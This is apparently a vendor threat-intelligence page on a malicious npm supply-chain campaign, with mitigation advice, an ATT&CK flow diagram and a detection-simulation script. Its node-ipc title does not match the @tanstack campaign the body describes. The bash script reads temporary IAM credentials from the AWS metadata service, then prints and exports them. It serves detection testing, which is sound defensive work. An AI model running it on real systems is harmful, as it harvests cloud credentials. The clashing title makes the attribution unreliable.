Active Supply Chain Attack Compromises node-ipc Package

SOC Prime Team

Active Supply Chain Attack Compromises node-ipc Package

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

Socket researchers uncovered a supply-chain compromise impacting 84 npm packages published under the @tanstack namespace. The malicious updates introduced a heavily obfuscated JavaScript file designed to steal CI-related secrets from GitHub Actions, AWS, HashiCorp Vault, and Kubernetes environments, then use those credentials to republish itself to npm. The payload also planted persistence hooks inside Claude Code and VS Code configuration directories. Researchers linked the activity to the broader Mini Shai-Hulud supply-chain malware campaign.

Investigation

The investigation identified a newly added file, router_init.js, which used string-array rotation, an additional XOR and Base64 decoding layer, and daemonization to conceal its behavior. The malware targeted environment variables, cloud metadata services, and API endpoints associated with GitHub, AWS, Vault, and Kubernetes to collect credentials. It propagated by abusing GitHub Actions OIDC federation to obtain npm publishing tokens and inserted a malicious optionalDependency on @tanstack/setup. Exfiltration traffic was routed through the Session decentralized messaging network.

Mitigation

Organizations affected by the campaign should verify hashes for all @tanstack/* package contents, rotate all CI and cloud credentials, revoke exposed OIDC federation grants, and remove unauthorized files from .claude and .vscode directories. Blocking outbound traffic to filev2.getsession.org and enforcing integrity controls for npm packages can further reduce exposure. GitHub Actions workflows should also be hardened by pinning third-party actions and minimizing id-token permissions.

Response

Defenders should hunt for the presence of router_init.js and related filenames, monitor for suspicious spawned processes, and alert on access to the identified cloud metadata endpoints. Any compromised packages should be quarantined, malicious hooks removed, and all exposed credentials rotated immediately. Security teams should also conduct a full review of GitHub Actions activity for unauthorized token use and validate the provenance of all published npm packages.

"graph TB %% Class Definitions classDef technique fill:#e6f7ff classDef operator fill:#ffcc66 %% Nodes representing each ATT&CK technique a_initial_access["Technique – T1195.001 Supply Chain Compromise Description: Adversary compromises a software supply chain (e.g., malicious npm package) to gain initial access."] class a_initial_access technique b_execution["Technique – T1129 Shared Modules Description: Malicious shared module (router_init.js) runs automatically during package installation."] class b_execution technique c_persistence["Technique – T1176.002 IDE Extensions Description: Writes hidden files (.claude, .vscode) and hooks to maintain persistence via compromised IDE extensions."] class c_persistence technique d_def_evasion["Technique – T1027 Obfuscated Files or Information Description: Payload is obfuscated to avoid detection. Technique – T1140 Deobfuscate/Decode Files or Information Description: Runtime routine deu2011obfuscates code before execution."] class d_def_evasion technique e_cred_access["Technique – T1552.005 Unsecured Credentials Description: Reads cloud instance metadata API for credentials. Technique – T1555.006 Cloud Secrets Management Description: Retrieves secrets from cloud secret stores."] class e_cred_access technique f_account_disc["Technique – T1087.004 Cloud Account Description: Enumerates cloud account information to identify resources and privileges."] class f_account_disc technique g_cred_use["Technique – T1078 Valid Accounts Description: Uses harvested OIDC token as a valid account to publish further malicious packages."] class g_cred_use technique h_propagation["Technique – T1195.001 Supply Chain Compromise Description: Reu2011uses malicious package via optionalDependencies and npm prepare hook to spread to downstream projects."] class h_propagation technique i_command_exec["Technique – T1059.009 Cloud API Calls Description: Executes commands by invoking GitHub, AWS and Vault APIs directly from the compromised environment."] class i_command_exec technique j_exfiltration["Technique – T1041 Exfiltration Over C2 Channel Description: Exfiltrates data over a peeru2011tou2011peer session channel established between compromised nodes."] class j_exfiltration technique k_remote_services["Technique – T1021.007 Cloud Services Description: Leverages GitHub GraphQL commits as a remote service to maintain command and control."] class k_remote_services technique %% Sequential flow connections a_initial_access –>|leads_to| b_execution b_execution –>|leads_to| c_persistence c_persistence –>|leads_to| d_def_evasion d_def_evasion –>|leads_to| e_cred_access e_cred_access –>|leads_to| f_account_disc f_account_disc –>|leads_to| g_cred_use g_cred_use –>|leads_to| h_propagation h_propagation –>|leads_to| i_command_exec i_command_exec –>|leads_to| j_exfiltration j_exfiltration –>|leads_to| k_remote_services "

Attack Flow

Attack Narrative & Commands:
1. Obtain an IMDSv2 session token – the attacker issues a PUT request to the token endpoint with a TTL of 21600 seconds.
2. Use the token to query the IAM role name exposed at /latest/meta-data/iam/security-credentials/.
3. Retrieve the temporary IAM credentials (AccessKeyId, SecretAccessKey, Token) for the instance profile.
4. Store the credentials locally for later use (e.g., to call AWS APIs, pivot, or conduct password‑spraying attacks).
These steps generate HTTP traffic to the exact URIs listed in the Sigma rule, which, when captured by VPC Flow Logs, should satisfy the detection condition.

Regression Test Script:

#!/usr/bin/env bash
# -------------------------------------------------
# Script: aws_imds_credential_harvest.sh
# Purpose: Simulate credential harvesting via IMDSv2 / ECS metadata
# -------------------------------------------------

set -euo pipefail

# 1. Request IMDSv2 token
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" 
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" -s)

if [[ -z "$TOKEN" ]]; then
  echo "[!] Failed to obtain IMDSv2 token"
  exit 1
fi
echo "[*] Obtained IMDSv2 token"

# 2. Get IAM role name associated with the instance
ROLE_NAME=$(curl -H "X-aws-ec2-metadata-token: $TOKEN" 
  -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)

if [[ -z "$ROLE_NAME" ]]; then
  echo "[!] Unable to retrieve IAM role name"
  exit 1
fi
echo "[*] Instance IAM role: $ROLE_NAME"

# 3. Retrieve temporary credentials for the role
CREDS_JSON=$(curl -H "X-aws-ec2-metadata-token: $TOKEN" 
  -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE_NAME)

echo "[*] Retrieved credentials:"
echo "$CREDS_JSON" | jq .

# 4. (Optional) Export as environment variables for later AWS CLI use
export AWS_ACCESS_KEY_ID=$(echo "$CREDS_JSON" | jq -r .AccessKeyId)
export AWS_SECRET_ACCESS_KEY=$(echo "$CREDS_JSON" | jq -r .SecretAccessKey)
export AWS_SESSION_TOKEN=$(echo "$CREDS_JSON" | jq -r .Token)

echo "[*] Credentials exported to environment (for demonstration only)."
# -------------------------------------------------
# End of script
# -------------------------------------------------

Cleanup Commands:

# Unset environment variables that hold temporary credentials
unset AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY AWS_SESSION_TOKEN

# Remove any temporary files (none created in this script)
echo "[*] Cleanup complete."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free